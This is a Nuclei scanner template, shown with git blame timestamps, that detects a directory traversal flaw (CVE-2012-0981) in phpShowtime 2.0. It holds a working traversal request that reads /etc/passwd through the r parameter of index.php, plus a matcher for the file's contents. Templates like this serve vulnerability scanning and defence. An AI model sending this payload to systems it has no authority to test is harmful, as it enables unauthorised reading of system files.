my-nuclei-templates/CVE-2012-0981.yaml

34 lines
872 B
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
2021-11-09 22:49:13 +00:00
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
2022-06-18 08:05:25 +00:00
- http://secunia.com/advisories/47802
- http://www.exploit-db.com/exploits/18435
classification:
cve-id: CVE-2012-0981
2021-11-09 22:49:13 +00:00
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/21